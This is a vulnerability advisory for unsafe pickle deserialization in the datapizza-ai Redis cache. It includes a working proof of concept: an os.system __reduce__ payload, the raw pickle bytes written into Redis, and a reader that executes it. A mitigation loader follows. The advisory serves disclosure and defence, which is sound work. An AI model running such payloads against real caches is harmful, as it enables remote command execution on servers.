### Summary

- **Vulnerability:** Unsafe deserialization via `pickle.loads()` in the datapizza-ai Redis cache.
- **Impact:** Allows remote command execution on the server host.
- **CVSSv3:** HIGH 7.9/10
- **CVSS vector:** CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H
- **datapizza-ai Version:** v0.0.7

### Details

- **Cause:** The Redis cache backend in `datapizza-ai-cache/redis/datapizza/cache/redis/cache.py` deserializes cached values with the `pickle` library. `pickle` resolves and calls any callable named in the serialized data, so whoever can write a value into the Redis instance controls what is executed when the application reads that key back.
- **Source:** [GitHub Link](https://github.com/datapizza-labs/datapizza-ai/blob/v0.0.7/datapizza-ai-cache/redis/datapizza/cache/redis/cache.py)

### PoC

#### Installation Steps

```bash
python -m venv .env
source .env/bin/activate
pip install datapizza-ai==0.0.7
pip install datapizza-ai-cache-redis
```

#### Redis Server

```bash
docker run -d --name redis -p 6379:6379 redis:latest
```

#### Proof of Concept

- **Evil Class:**

```python
import os


class Evil:
    # __reduce__ tells pickle to reconstruct this object by calling
    # os.system("touch cachepwned"); pickle.loads() performs that call.
    def __reduce__(self):
        return (os.system, ("touch cachepwned",))
```

- **Hex Representation:** `\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch cachepwned\x94\x85\x94R\x94.`

- **Redis Cache Poisoning:**

```bash
127.0.0.1:6379> set poc "\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch cachepwned\x94\x85\x94R\x94"
OK
127.0.0.1:6379> get poc
```

#### Python Program

```python
from datapizza.cache.redis import RedisCache


def test_redis_cache():
    # Reading the poisoned key is enough: RedisCache.get() unpickles the
    # stored value, which runs the embedded os.system call.
    cache = RedisCache(host="localhost", port=6379, db=0)
    cache.get("poc")


test_redis_cache()
```

- **Command Injection Result (ls -alh):**

```bash
total 16K
-rw-rw-r-- 1 edoardo edoardo    0 Oct 15 18:57 cachepwned
-rw-rw-r-- 1 edoardo edoardo  778 Oct 15 19:00 notes.txt
-rw-rw-r-- 1 edoardo edoardo  826 Oct 14 14:39 poc3-working.py
-rw-rw-r-- 1 edoardo edoardo  312 Oct 15 18:51 poc-cache.py
drwxrwxr-x 5 edoardo edoardo 4.0K Oct 14 11:53 .venv/
```

### Impact

- **An attacker who can write to the Redis cache can subvert model behavior and inject fake outputs into cached queries.**
- **Arbitrary system command execution is possible (e.g., a reverse shell).**
- **High impact: the attacker can completely take over the server host.**

### References

- [Python Pickle Documentation](https://docs.python.org/3/library/pickle.html)

### Credits

- **Edoardo Ottavianelli [@edoardott]**
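The loader below is an added mitigation example for the unsafe `pickle.loads()` path described in Details; it is not code from datapizza-ai. It feeds the advisory's exact poisoned bytes to a `pickle.Unpickler` subclass whose `find_class()` only resolves plain builtin data types (so `posix.system` is refused before it is ever called), and adds an HMAC-SHA256 tag so entries not written by a key holder are rejected without being unpickled at all. `CACHE_KEY`, `seal`, `open_sealed` and `is_rejected` are hypothetical names chosen for this example.

```python
import hmac
import io
import pickle

# Constructed copy of the advisory's poisoned cache value: a pickle that calls
# posix.system("touch cachepwned") under plain pickle.loads(). It only reaches
# the restricted loader below, which aborts before any callable is resolved.
POISONED = (
    b"\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system"
    b"\x94\x93\x94\x8c\x10touch cachepwned\x94\x85\x94R\x94."
)

# Hypothetical secret shared only by processes allowed to write cache entries.
CACHE_KEY = b"example-cache-hmac-key-rotate-me"


class RestrictedUnpickler(pickle.Unpickler):
    """Allow plain data types only. find_class() runs for every GLOBAL /
    STACK_GLOBAL opcode, so os.system, posix.system, subprocess... abort here."""

    ALLOWED = {"builtins": {"dict", "list", "tuple", "set", "frozenset",
                            "str", "bytes", "int", "float", "bool"}}

    def find_class(self, module, name):
        if name in self.ALLOWED.get(module, ()):
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def safe_loads(blob: bytes):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def seal(key: bytes, obj) -> bytes:
    """Serialize obj and prepend a 32-byte HMAC-SHA256 tag over the pickle."""
    body = pickle.dumps(obj, protocol=4)
    return hmac.new(key, body, "sha256").digest() + body


def open_sealed(key: bytes, blob: bytes):
    """Reject unsigned or tampered entries before the bytes reach the
    unpickler; entries that pass are still loaded through the allowlist."""
    tag, body = blob[:32], blob[32:]
    if not hmac.compare_digest(tag, hmac.new(key, body, "sha256").digest()):
        raise ValueError("cache entry failed HMAC check (tampered or unsigned)")
    return safe_loads(body)


def is_rejected(loader, *args) -> bool:
    try:
        loader(*args)
    except (pickle.UnpicklingError, ValueError):
        return True
    return False
```

Switching the cache to JSON (or another data-only format) removes the class entirely; the allowlist and HMAC are the defence-in-depth option when pickle must stay.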